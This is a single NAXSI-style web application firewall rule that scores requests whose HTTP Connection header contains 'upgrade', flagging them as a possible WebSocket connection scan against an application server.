MainRule "str:upgrade" "msg:DN APP_SERVER Websocket-Connection-Scan" "mz:$HEADERS_VAR:Connection" "s:$UWA:8" id:42000340 ;